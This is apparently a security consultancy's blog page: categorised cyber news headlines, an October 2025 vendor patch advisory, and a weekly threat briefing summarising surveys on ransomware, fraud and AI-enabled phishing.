Co-op CEO: ‘The buck for cyber stops with us as senior leaders’ – PublicTechnology

Extortion Group Leaks Millions of Records From Salesforce Hacks - SecurityWeek

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Qilin Ransomware announced new victims

Qantas says customer data released by cyber criminals months after cyber breach | Reuters

Clop Ransomware group claims the hack of Harvard University

Volkswagen France claimed by Qilin ransomware Volkswagen France hit by ransomware, Qilin gang claims | Cybernews

Phishing & Email Based Attacks

ClickFix attacks are surging, and Microsoft says you are the only defense | ZDNET

77% of security leaders say they'd fire staff who fall for phishing scams, even though they've done the same thing | IT Pro

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

Fresh Phishing Kit Innovation: Automated ClickFix Attacks

Microsoft remains the most imitated brand in phishing scams - BetaNews

KnowBe4 warns of new PayPal invoice phishing scam - IT Security Guru

Cyberattackers Target LastPass, Top Password Managers

LastPass Warns Customers It Has Not Been Hacked Amid Phishing Emails - Infosecurity Magazine

Other Social Engineering

ClickFix attacks are surging, and Microsoft says you are the only defense | ZDNET

Victims of romance fraud tricked out of £106m last year - BBC News

Banks need stricter controls to prevent romance fraud, says City regulator | Cybercrime | The Guardian

Fraud, Scams and Financial Crime

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

Cybercriminals flooded the web with fake Amazon pages as Prime Day deals triggered a wave of dangerous scams | TechRadar

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

UK telcos step up efforts to combat ‘epidemic’ of handset fraud

Artificial Intelligence

Rise in ‘Shadow AI’ tools raising security concerns for UK

Microsoft warns of the dangers of Shadow AI • The Register

Ukraine sees surge in AI-Powered cyberattacks by Russia-linked Threat Actors

Your browser is an AI-enabled OS, so secure it like one | TechTarget

Researchers Warn of Security Gaps in AI Browsers - Infosecurity Magazine

Everyone wants AI, but few are ready to defend it - Help Net Security

UK Firms Lose Average of £2.9m to AI Risk - Infosecurity Magazine

AI Attacks Surge as Microsoft Process 100 Trillion Signals Daily - Infosecurity Magazine

Security risks of vibe coding and LLM assistants for developers

Teenager allegedly incriminates himself via conversation with AI chat bot | The Independent

CISOs brace for an “AI vs. AI” fight | CSO Online

2FA/MFA

Hackers can steal 2FA codes and private messages from Android phones - Ars Technica

New 'Pixnapping' attack lets hackers steal Android chats, 2FA codes in seconds | Mashable

Malware

New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs

Astaroth Banking Trojan Abuses GitHub to Remain Operational After Takedowns

Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads - Cyber Security News

New Stealit Malware Campaign Spreads via VPN and Game Installer Apps - Infosecurity Magazine

Massive multi-country botnet targets RDP services in the US

What a new mega-worm says about open source cybersecurity - Tech Monitor

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

Nation-state hackers deliver malware from “bulletproof” blockchains - Ars Technica

China's Flax Typhoon Turns Geo-Mapping into Backdoor

Bots/Botnets

New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs

Massive multi-country botnet targets RDP services in the US

RondoDox Botnet targets 56 flaws across 30+ device types worldwide

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

Mobile

Hackers can steal 2FA codes and private messages from Android phones - Ars Technica

New 'Pixnapping' attack lets hackers steal Android chats, 2FA codes in seconds | Mashable

You Only Need $750 of Equipment to Pilfer Data From Satellites, Researchers Say

Researchers find a startlingly cheap way to steal your secrets from space | CyberScoop

Denial of Service/DoS/DDoS

Man Launches "World's First Waymo DDoS" by Ordering 50 Robotaxis to Dead End Street

Internet of Things – IoT

RondoDox Botnet targets 56 flaws across 30+ device types worldwide

Man Launches "World's First Waymo DDoS" by Ordering 50 Robotaxis to Dead End Street

Humanoid robot found vulnerable to Bluetooth hack, data leaks to China - Help Net Security

Data Breaches/Leaks

Cyber giant F5 Networks says government hackers had 'long-term' access to its systems, stole code and customer data | TechCrunch

US Warns of ‘Catastrophic’ Hacks After Cyber Firm F5 Breach - Bloomberg

China Accessed Classified UK Systems for a Decade, Officials Say - Bloomberg

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Attackers exploit valid logins in SonicWall SSL VPN compromise

Prospect union tells members their data was breached in June • The Register

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Revealed: Hundreds of passwords linked to government departments leaked on dark web | The Independent

The company Discord blamed for its recent breach says it wasn't hacked

Thousands of civil servants have password exposed for over a year in 'particularly dangerous' incident | TechRadar

Over 23 Million Victims Hit by Data Breaches in Q3 - Infosecurity Magazine

How Cybercriminal Organizations Weaponize Exposed Secrets - Security Boulevard

Spanish fashion retailer MANGO disclosed a data breach

Auction giant Sotheby’s says data breach exposed financial information

Cabinet Office rejects Cummings' claim that China breached high-level systems - BBC News

8 Auto Insurance Providers to Pay New York $19M Over Data Breaches

They were victims of a massive data breach in 2009. Their employer denied it for a decade | CBC News

Have I Been Pwned: Prosper data breach impacts 17.6 million accounts

Organised Crime & Criminal Actors

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

UK and US impose sanctions on alleged Cambodian ‘cyber-scam’ network

Cybercriminals flooded the web with fake Amazon pages as Prime Day deals triggered a wave of dangerous scams | TechRadar

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Cybercrime ring GXC Team dismantled in Spain, 25-year-old leader detained

PowerSchool hacker sentenced to 4 years in prison | CyberScoop

Attackers don’t linger, they strike and move on - Help Net Security

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Scam texts net over $1 billion for cyber gangs - how to avoid their traps | ZDNET

North Korean operatives spotted using evasive techniques to steal data and cryptocurrency | CyberScoop

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

Insurance

Ransomware costs soar as cyber claims decline - Insurance Post

How Ransomware’s Data Theft Evolution is Rewriting Cyber Insurance Risk Models - Security Boulevard

Cyberwar angst slowing market development - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community |

Supply Chain and Third Parties

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Supply Chain Risks Lurking in VS Code Marketplaces

The company Discord blamed for its recent breach says it wasn't hacked

Why vendor risk management can’t be an afterthought

Software Supply Chain

Supply Chain Risks Lurking in VS Code Marketplaces

Astaroth Banking Trojan Abuses GitHub to Remain Operational After Takedowns

Cloud/SaaS

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

Fresh Phishing Kit Innovation: Automated ClickFix Attacks

Microsoft investigates outage affecting Microsoft 365 apps

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft disrupts ransomware attacks targeting Teams users

Outages

Microsoft investigates outage affecting Microsoft 365 apps

Identity and Access Management

The password problem we keep pretending to fix - Help Net Security

Linux and Open Source

LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets

What a new mega-worm says about open source cybersecurity - Tech Monitor

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

New Rootkit Campaign Exploits Cisco SNMP Flaw to Gain Persistence - Infosecurity Magazine

German state replaces Microsoft Exchange and Outlook with open-source email | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

SonicWall VPN accounts breached using stolen creds in widespread attacks

The password problem we keep pretending to fix - Help Net Security

Thousands of civil servants have password exposed for over a year in 'particularly dangerous' incident | TechRadar

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

Cyberattackers Target LastPass, Top Password Managers

LastPass Warns Customers It Has Not Been Hacked Amid Phishing Emails - Infosecurity Magazine

Legacy Windows Protocols Still Expose Networks to Credential Theft - Infosecurity Magazine

Revealed: Hundreds of passwords linked to government departments leaked on dark web | The Independent

Social Media

How to secure corporate social media accounts before they become a breach vector | SC Media

Regulations, Fines and Legislation

Capita fined £14M after 58-hour delay exposed 6.6M records • The Register

Banks failing to curb rise in romance fraud, says UK watchdog

Victims of romance fraud tricked out of £106m last year - BBC News

Banks need stricter controls to prevent romance fraud, says City regulator | Cybercrime | The Guardian

Ofcom fines 4chan £20K for Online Safety Act failings • The Register

Cyber Resilience Act: The Clock is Ticking for Compliance | White & Case LLP - JDSupra

Cisco faces Senate scrutiny over firewall flaws • The Register

8 Auto Insurance Providers to Pay New York $19M Over Data Breaches

The Things that Bedevil U.S. Cyber Power

The End of Cybersecurity | Foreign Affairs

Homeland Security reassigns 'hundreds' of CISA cyber staffers to support Trump's deportation crackdown | TechCrunch

Models, Frameworks and Standards

Cyber Resilience Act: The Clock is Ticking for Compliance | White & Case LLP - JDSupra

Law Enforcement Action and Take Downs

U.S. seizes $15 billion in Bitcoin linked to massive forced-labor crypto scam - Help Net Security

UK, US Sanction Southeast Asia-Based Online Scam Network - Infosecurity Magazine

Operation Heracles strikes blow against massive network of fraudulent crypto trading sites

The UK Dealer With Prosthetic Hands Brought Down by the World’s Biggest Dark Web Bust

Massive blow to cybercriminals in the EU: law enforcement blocked over 1,400 fraudulent websites | УНН

Cybercrime ring GXC Team dismantled in Spain, 25-year-old leader detained

PowerSchool hacker sentenced to 4 years in prison | CyberScoop

Domains used by notorious hacking group ShinyHunters for Salesforce hacks disrupted in FBI takedown | TechRadar

Third time lucky? The FBI just took down BreachForums, again | IT Pro

BreachForums seized, but hackers say they will still leak Salesforce data

Teenager allegedly incriminates himself via conversation with AI chat bot | The Independent

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russian cyber-attacks against Nato states up by 25% in a year, analysis finds | Nato | The Guardian

Cyberwar angst slowing market development - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community |

Nation State Actors

UK hit by record number of ‘nationally significant’ cyberattacks | The Record from Recorded Future News

Ministers urge businesses to take cyber-attacks seriously - UKTN

Ministerial letter on cyber security to leading UK companies - GOV.UK

NCSC demands action amid 50% surge in major UK cyberattacks • The Register

UK security services step up work with business to fight cyber threats

Cyber giant F5 Networks says government hackers had 'long-term' access to its systems, stole code and customer data | TechCrunch

US Warns of ‘Catastrophic’ Hacks After Cyber Firm F5 Breach - Bloomberg

F5 Says Nation-State Hackers Stole Source Code and Vulnerability Data - SecurityWeek

Thousands of customers imperiled after nation-state ransacks F5’s network - Ars Technica

Nation-state hackers deliver malware from “bulletproof” blockchains - Ars Technica

China

China and Russia posing ‘significant threat’ to UK cyberspace, experts warn | The Independent

China poses 'highly sophisticated' cyber threat to UK, NCSC warns | UK News | Sky News

Cyber-attacks rise by 50% in past year, UK security agency says | Cybercrime | The Guardian

Chinese Hackers Exploit ArcGIS Server as Backdoor for Over a Year

Netherlands seizes Chinese-owned microchip maker to protect national security

China Accessed Classified UK Systems for a Decade, Officials Say - Bloomberg

Cabinet Office rejects Cummings' claim that China breached high-level systems - BBC News

China's Flax Typhoon Turns Geo-Mapping into Backdoor

The controversy over the collapsed China spy case explained - BBC News

Badenoch demands PM address 'unanswered' China spy case questions - BBC News

Taiwan faces 2.8 million Chinese cyberattacks a day | Taiwan News | Oct. 14, 2025 10:05

Humanoid robot found vulnerable to Bluetooth hack, data leaks to China - Help Net Security

Researchers report rare intrusion by suspected Chinese hackers into Russian tech firm | The Record from Recorded Future News

Chinese Threat Group 'Jewelbug' Quietly Infiltrated Russian IT Network for Months

Phishing kit YYlaiyu impersonates 97 brands for fraud • The Register

Russia

China and Russia posing ‘significant threat’ to UK cyberspace, experts warn | The Independent

China poses 'highly sophisticated' cyber threat to UK, NCSC warns | UK News | Sky News

Cyber-attacks rise by 50% in past year, UK security agency says | Cybercrime | The Guardian

Russian cyber-attacks against Nato states up by 25% in a year, analysis finds | Nato | The Guardian

Russian hackers target software used by Treasury and NHS

Russia may have been behind Jaguar Land Rover cyber attack

Ukraine sees surge in AI-Powered cyberattacks by Russia-linked Threat Actors

Chinese cyberspies compromised Russian tech provider • The Register

Hacktivists deactivate after falling into researchers' trap • The Register

Iran

Iran is not initiating cyberattacks against any country - Mehr News Agency

North Korea

North Korean operatives spotted using evasive techniques to steal data and cryptocurrency | CyberScoop

Tools and Controls

Your browser is an AI-enabled OS, so secure it like one | TechTarget

CISOs must rethink the tabletop, as 57% of incidents have never been rehearsed | CSO Online

The password problem we keep pretending to fix - Help Net Security

Why vendor risk management can’t be an afterthought

Massive multi-country botnet targets RDP services in the US

Researchers Warn of Security Gaps in AI Browsers - Infosecurity Magazine

Everyone’s adopting AI, few are managing the risk - Help Net Security

Hackers Turn Velociraptor DFIR Tool Into Weapon in LockBit Ransomware Attacks

Cisco, Fortinet, Palo Alto Networks Devices Targeted in Coordinated Campaign - SecurityWeek

Inside the CISO Mind: How Security Leaders Choose Solutions - Security Boulevard

Legacy Windows Protocols Still Expose Networks to Credential Theft - Infosecurity Magazine

Security risks of vibe coding and LLM assistants for developers

How Ransomware’s Data Theft Evolution is Rewriting Cyber Insurance Risk Models - Security Boulevard

3 firmware security failures that show how little motherboard manufacturers care

CISOs brace for an “AI vs. AI” fight | CSO Online

Other News

Europe’s fall from cyber safety grace: why it is now among the world’s riskiest cyber regions | TechRadar

Satellites Are Leaking the World’s Secrets: Calls, Texts, Military and Corporate Data | WIRED

Cisco, Fortinet, Palo Alto Networks Devices Targeted in Coordinated Campaign - SecurityWeek

Critical infrastructure CISOs Can't Ignore Office Data

Why the web-hosting industry needs a trust seal | CyberScoop

Dull but dangerous: A guide to 15 overlooked cybersecurity blind spots | CSO Online

The power grid is getting old, and so is the cybersecurity protecting it - Help Net Security

EU's biometric border system suffers teething problems • The Register

Leak From the Sky: It Turns Out a Lot of Satellite Data Is Unencrypted | PCMag

Legacy Windows Protocols Still Expose Networks to Credential Theft - Infosecurity Magazine

The solar power boom opened a backdoor for cybercriminals - Help Net Security

Focus on cyber security essential, says Taoiseach

How This Overlooked Risk Can Collapse Your Startup Overnight

Vulnerability Management

Final Windows 10 Patch Tuesday update rolls out as support ends

Windows 10 Still on Over 40% of Devices as It Reaches End of Support - SecurityWeek

Microsoft: Exchange 2016 and 2019 have reached end of support

CVE, CVSS scores need overhauling, argues Codific CEO • The Register

Security firms dispute credit for overlapping CVE reports

Vulnerabilities

F5 releases BIG-IP patches for stolen security vulnerabilities

Cisco faces Senate scrutiny over firewall flaws • The Register

Attackers exploit valid logins in SonicWall SSL VPN compromise

Experts Warn of Widespread SonicWall VPN Compromise Impacting Over 100 Accounts

Microsoft Defender Vulnerabilities Allow Attackers to Bypass Authentication and Upload Malicious Files

New Oracle E-Business Suite Bug Could Let Hackers Access Data Without Login

Microsoft frightful Patch Tuesday: 175+ CVEs, 3 under attack • The Register

Critical Veeam Backup RCE Vulnerabilities Let Attackers Execute Malicious Code Remotely

Cisco, Fortinet, Palo Alto Networks Devices Targeted in Coordinated Campaign - SecurityWeek

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks

ZDI Drops 13 Unpatched Ivanti Endpoint Manager Vulnerabilities - SecurityWeek

New 7-Zip high-severity vulnerabilities expose systems to remote attackers — users should update to version 25 ASAP | Tom's Hardware

High-Severity Vulnerabilities Patched by Fortinet and Ivanti - SecurityWeek

Adobe Patches Critical Vulnerability in Connect Collaboration Suite - SecurityWeek

CISA Flags Adobe AEM Flaw with Perfect 10.0 Score — Already Under Active Attack

Microsoft patches ASP.NET Core bug rated highly critical • The Register

Juniper patched nine critical flaws in Junos Space

SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM - SecurityWeek

Gladinet Patches Exploited CentreStack Vulnerability - SecurityWeek

Final Windows 10 Patch Tuesday update rolls out as support ends

Windows 10 Still on Over 40% of Devices as It Reaches End of Support - SecurityWeek

Oracle rushes out another emergency E-Business Suite patch • The Register

Secure Boot bypass risk threatens nearly 200,000 Linux Framework laptops

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 16/10/2025 Black Arrow Admin 16/10/2025

Black Arrow Cyber Advisory 16 October 2025 - Security Updates from Microsoft, SAP, Fortinet, Ivanti and Oracle (E-Business Suite)

Executive Summary

This month’s updates span Microsoft’s regular Patch Tuesday release, SAP’s Security Patch Day, large batches from Fortinet across network and endpoint products, targeted fixes from Ivanti for enterprise mobility/secure access, and a standalone Oracle Security Alert for E-Business Suite issued on 11 October. Prioritise actively exploited Windows issues (where present), SAP high and critical security notes, Fortinet gateway/endpoint components, Ivanti EPM/EPMM/Neurons platforms, and Oracle E-Business Suite where exposure is internet-facing.

Vulnerabilities by Vendor

Microsoft: 173 vulnerabilities including five critical-severity security defects and two flaws that have been exploited in the wild.Vulnerabilies affecting Windows (client/server), Office/SharePoint, .NET/Visual Studio, Azure services, and Microsoft Edge (Chromium). Prioritise patches addressing any actively exploited items and Critical RCE/EoP paths in Windows and server components.
SAP: 16 new and updated patches as part of its monthly rollout, across on-prem and cloud product families (e.g., NetWeaver, S/4HANA, Business Objects). Prioritise High/Critical security notes and authentication/authorisation weaknesses.
Fortinet: 29 advisories across FortiOS/FortiProxy, FortiDLP, FortiClient, FortiIsolator, FortiPAM, FortiManager/Analyzer, FortiADC/FortiWeb and others. Prioritise High/Critical items on perimeter firewalls, proxies and endpoint agents; review PSIRT entries for products you operate.
Ivanti: Several updates across Endpoint Manager (EPM), End Point Manager Mobile (EPMM) and Neurons. Prioritise High/Critical updates for EPM and EPMM; apply latest EPM/EPMM and Neurons updates if not yet deployed.
Oracle (E-Business Suite only): 1 vulnerability (Security Alert CVE-2025-61884, released 11 October 2025), affecting E-Business Suite 12.2.3–12.2.14. Vulnerability is remotely exploitable without authentication; prioritise immediate patching on any externally accessible instances.

What’s the risk to me or my business?

What can I do?

Sources:
1 Microsoft — https://msrc.microsoft.com/update-guide
2 SAP — https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html
3 Fortinet — https://www.fortiguard.com/psirt
4 Ivanti — https://www.ivanti.com/blog/october-2025-security-update
5 Oracle — (E-Business Suite Security Alert CVE-2025-61884) — https://www.oracle.com/security-alerts/alert-cve-2025-61884.html

Black Arrow Admin 12/10/2025 Black Arrow Admin 12/10/2025

Black Arrow Cyber Threat Intelligence Briefing 10 October 2025

Black Arrow Cyber Threat Intelligence Briefing 10 October 2025:

-CFOs Put Cyber at the Top of the Risk Agenda

-SonicWall Cloud Backup Breach Exposes Firewall Configurations

-Budgets and Skills Lag Behind Rising Attacks

-SMBs Remain Exposed to AI‑Driven Threats and Ransomware Complacency

-Digital Fraud Now Costs Firms an Average 7.7% of Revenue

-Survey Finds Attacks Hit 91% of UK Universities and 43% of Businesses

-Insurer Forecasts 40% Rise in Named Ransomware Victims by 2026

-Paying Ransoms Increasingly Fails to Restore Data

-SaaS Incidents Surge Despite High Confidence

-AI Supercharges Phishing and Stretches Defences

-Deepfake Voice Risks Highlight Identity Verification Gaps

-Insurers and Asset Managers Expand Cybersecurity Oversight

Executive Summary

Our review of business and cyber security media this week highlights that cyber risk is escalating across finance, education and supply chains, with attacks growing in scale and sophistication. AI-driven threats and deepfake-enabled fraud are eroding traditional defences, while SaaS misconfigurations and legacy systems widen exposure.

Surveys reveal persistent gaps in budgets, skills and governance, leaving many organisations underprepared. Ransomware recovery rates are falling, and digital fraud now consumes a significant share of revenue.

Boards are under pressure to strengthen oversight and link leadership incentives to cyber performance, yet complacency remains a critical risk. In our work with business leaders across countries and sectors, we see the value of leaders taking command by understanding their risks and governing their resilience across people, operations and controls. Contact us to discuss how we can support your leadership through focused upskilling and governance support.

CFOs Put Cyber at the Top of the Risk Agenda

New research of UK finance leaders finds 99% experienced payments‑related cyber incidents in the past two years and 94% plan to raise cyber spend, with over half preparing a significant uplift. Accounts Payable automation is the top priority, yet 47% cite integration with existing systems as the main barrier and only 64% feel confident they have real‑time oversight. The findings underline the exposure created by legacy platforms and fragmented processes and the need for tighter controls, better visibility and stronger governance across finance operations.

Source: https://www.businesswire.com/news/home/20251008745273/en/Cybersecurity-Tops-CFOs-Risk-Agenda-With-99-Reporting-Incidents-and-94-Planning-to-Increase-Spend

SonicWall Cloud Backup Breach Exposes Firewall Configurations

SonicWall confirmed that an attacker accessed firewall configuration backup files for all customers who used its cloud backup service. While credentials in the files are encrypted, possession of configurations raises the risk of targeted exploitation. SonicWall, working with Mandiant, issued remediation guidance including comprehensive credential resets and prioritisation of internet‑facing devices.

Source: https://cyberscoop.com/sonicwall-customer-firewall-configurations-exposed/

Budgets and Skills Lag Behind Rising Attacks

ISACA’s latest survey reports 39% of European organisations are facing more attacks than a year ago, while only 38% are completely confident in detection and response. Despite incremental improvements, 58% remain understaffed and 54% say budgets are still insufficient. Stress and burnout persist, with 68% saying the job is more stressful than five years ago and 22% of organisations taking no action to address it. The data points to structural capability gaps that leadership must close to improve resilience.

Source: https://www.itsecurityguru.org/2025/10/08/research-finds-budgets-staffing-and-skills-fail-to-keep-pace-with-rising-cyber-threats/

SMBs Remain Exposed to AI‑Driven Threats and Ransomware Complacency

A new report highlights how AI is supercharging social engineering and malware while a complacency gap persists in smaller firms. Automated, highly personalised campaigns are raising the success rate of phishing and voice scams, and the financial fallout now stretches far beyond the ransom to business‑ending costs. The analysis argues that many SMBs still underestimate their exposure and need proactive, specialised security and clearer accountability for risk.

Source: https://betanews.com/2025/10/09/smbs-vulnerable-to-ai-powered-cyberattacks-and-complacent-about-ransomware/

Digital Fraud Now Costs Firms an Average 7.7% of Revenue

TransUnion’s H2 2025 update estimates global businesses lost $534bn over the past year to digital fraud, with US firms averaging 9.8% of revenue. Account takeover has surged and is now the top driver of losses in the US at 31%, with smishing, phishing and vishing widespread. The findings reinforce the need for stronger identity assurance, layered controls and active monitoring of customer interactions across channels.

Source: https://www.infosecurity-magazine.com/news/digital-fraud-costs-companies/

Survey Finds Attacks Hit 91% of UK Universities and 43% of Businesses

A recent UK survey reveals that 91% of universities and 43% of businesses experienced cyberattacks in the past year, affecting over 600,000 businesses and 61,000 charities. The findings highlight widespread vulnerabilities across sectors, with education institutions particularly exposed due to legacy systems and limited cyber budgets. Despite the scale of attacks, many organisations remain underprepared, lacking robust incident response plans and adequate cyber insurance. Experts warn that complacency and outdated security practices are leaving critical data and operations at risk, urging leadership to prioritise cyber resilience and invest in modern defences.

Source: https://www.tomshardware.com/tech-industry/cyber-security/cyberattacks-hit-91-percent-of-universities-and-43-percent-of-businesses-in-last-12-months-in-the-uk-survey-suggests-more-than-600-000-businesses-61-000-charities-affected

Insurer Forecasts 40% Rise in Named Ransomware Victims by 2026

QBE warns leak‑site victims could exceed 7,000 by 2026, a 40% jump on 2024, with criminals exploiting cloud platforms and AI. Between 2023 and 2025 the UK accounted for 10% of significant incidents. Deepfakes featured in nearly 10% of cases in 2024 with wide‑ranging losses. The report stresses supply chain dependencies and the need for stronger oversight of third parties and recovery planning.

Source: https://www.reinsurancene.ws/ransomware-attacks-to-surge-40-by-2026-amid-ai-and-cloud-vulnerabilities-qbe/

Paying Ransoms Increasingly Fails to Restore Data

A Veeam study finds only 32% of organisations that paid ransoms in 2024 recovered their data, down from 54% in 2023. 63% lack alternative infrastructure for site‑wide recovery. The report highlights data theft‑only tactics and the case for tested backups, segmented recovery and rehearsed decision‑making.

Source: https://www.techradar.com/pro/security/many-businesses-paying-a-ransomware-demand-dont-get-their-data-back

SaaS Incidents Surge Despite High Confidence

AppOmni’s 2025 study shows 75% of organisations suffered a SaaS incident in the past year while 91% felt confident in their posture. Incidents are often driven by permissions issues and misconfigurations, and accountability is fragmented across business units. The report calls for continuous oversight and independent validation of SaaS controls.

Source: https://securityboulevard.com/2025/10/75-of-orgs-had-a-saas-security-incident-despite-high-confidence-in-their-security-heres-why/

AI Supercharges Phishing and Stretches Defences

A Comcast report analysed 34.6 billion events, showing attackers scale noisy campaigns while running quiet intrusions in parallel. Generative AI makes it easier to craft realistic phishing attempts and malware, while shadow AI and non‑human identities widen exposure. Human fatigue and proxy abuse further erode traditional detection methods, strengthening the case for layered, behaviour‑based controls.

Source: https://www.helpnetsecurity.com/2025/10/06/phishing-ai-enterprise-resilience-security/

Deepfake Voice Risks Highlight Identity Verification Gaps

Microsoft halted its Speak for Me voice cloning test after concerns it could enable fraud through highly convincing impersonations. This highlights the dangers of implementing voice cloning without strong security and verification controls.

Source: https://www.darkreading.com/application-security/microsoft-voice-clone-scary-unsalvageable

Insurers and Asset Managers Expand Cybersecurity Oversight

Moody’s survey of 102 insurers and asset managers shows cyber security remains a top board-level priority. Budgets are rising, firms plan to hire specialists, and advanced defence strategies are being adopted. Oversight is strengthening, with 40% now linking CEO pay to cyber performance goals, up from 24% in 2023. Regional gaps persist in third-party risk management, AI governance, and cyber insurance coverage. Most respondents maintain vendor risk programmes, and over 80% have AI policies. Cyber insurance adoption is highest in the Americas, and 21% plan to increase coverage limits in 2025.

Source: https://www.reinsurancene.ws/insurers-and-asset-managers-strengthen-cybersecurity-oversight-and-expand-budgets-moodys/

Governance, Risk and Compliance

Cybersecurity Tops CFO’s Risk Agenda With 99% Reporting Incidents and 94% Planning to Increase Spend

Research Finds Budgets, Staffing and Skills Fail to Keep Pace with Rising Cyber Threats - IT Security Guru

Insurers and asset managers strengthen cybersecurity oversight and expand budgets: Moody’s - Reinsurance News

Cyberattacks hit 91% of universities and 43% of businesses in last 12 months in the UK — survey suggests more than 600,000 businesses, 61,000 charities affected | Tom's Hardware

The cost of cyber hacking on UK business is greater than it seems - BBC News

Overconfidence major cyber risk for business – report

Six metrics policymakers need to track cyber resilience - Help Net Security

The Evolving Role of the CSO: From Technical Guardian to Business Strategist  - Security Boulevard

NCSC: Observability and Threat Hunting Must Improve - Infosecurity Magazine

Cyber Risks Can Be Legal Risks: How to Protect the Organization | Security Magazine

Threats

Ransomware, Extortion and Destructive Attacks

Paying ransoms fails to guarantee recovery as cyber criminals demand more while firms burn cash and struggle with rising losses | TechRadar

Many businesses paying a ransomware demand don't get their data back | TechRadar

Ransomware Group “Trinity of Chaos” Launches Data Leak Site - Infosecurity Magazine

'Cops and robbers': Top 5 ransomware groups behind nearly half of all attacks | Insurance Business America

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

29% of businesses that paid cyber attack ransoms still had their data leaked

Active Ransomware Groups Reach an All-Time High, GuidePoint Security Finds

SMBs vulnerable to AI-powered cyberattacks and complacent about ransomware - BetaNews

Hackers launch data leak site to extort 39 victims, or Salesforce - Help Net Security

Salesloft hackers outsourcing ransom negotiations for $10 • The Register

LockBit, Qilin, and DragonForce Join Forces to Dominate the Ransomware Ecosystem

Ransomware Attacks Skyrocket, Forcing Companies to Confront a Vexing Question | Law.com

Cybersecurity Needs A Supply Chain Perspective: JLR attack Shows Why

Google says 'likely over 100' affected by Oracle-linked hacking campaign | Reuters

BBC journalist lured with promises of millions in ransom before hackers unleashed chaotic phone attacks in chilling twist | TechRadar

Oracle links Clop extortion attacks to July 2025 vulnerabilities

Oracle tells Clop-targeted EBS users to apply July patch • The Register

Microsoft: Critical GoAnywhere bug exploited in ransomware attacks

Red Hat data breach escalates as ShinyHunters joins extortion

Hackers claim to have stolen over a billion Salesforce records - and are demanding nearly $1 billion not to leak them | TechRadar

Salesforce refuses to pay ransom over widespread data theft attacks

Inside the 'Trinity of Chaos' group of young hackers targeting major companies - ABC News

Ransomware Gangs Leverage Remote Access Tools to Gain Persistence and Evade Defenses

XWorm malware resurfaces with ransomware module, over 35 plugins

Teens arrested in London preschool ransomware attack • The Register

Chaos Ransomware Upgrades With Aggressive New Variant

Hackers now use Velociraptor DFIR tool in ransomware attacks

Ransomware Victims

Hackers hold 1 billion customer records to ransom | The Independent

The cost of cyber hacking on UK business is greater than it seems - BBC News

Salesforce refuses to pay ransomware crims' extortion demand • The Register

Jaguar Land Rover Shows Cyberattacks Mean Business

Japan’s Asahi ships beer manually after ransomware attack | The Straits Times

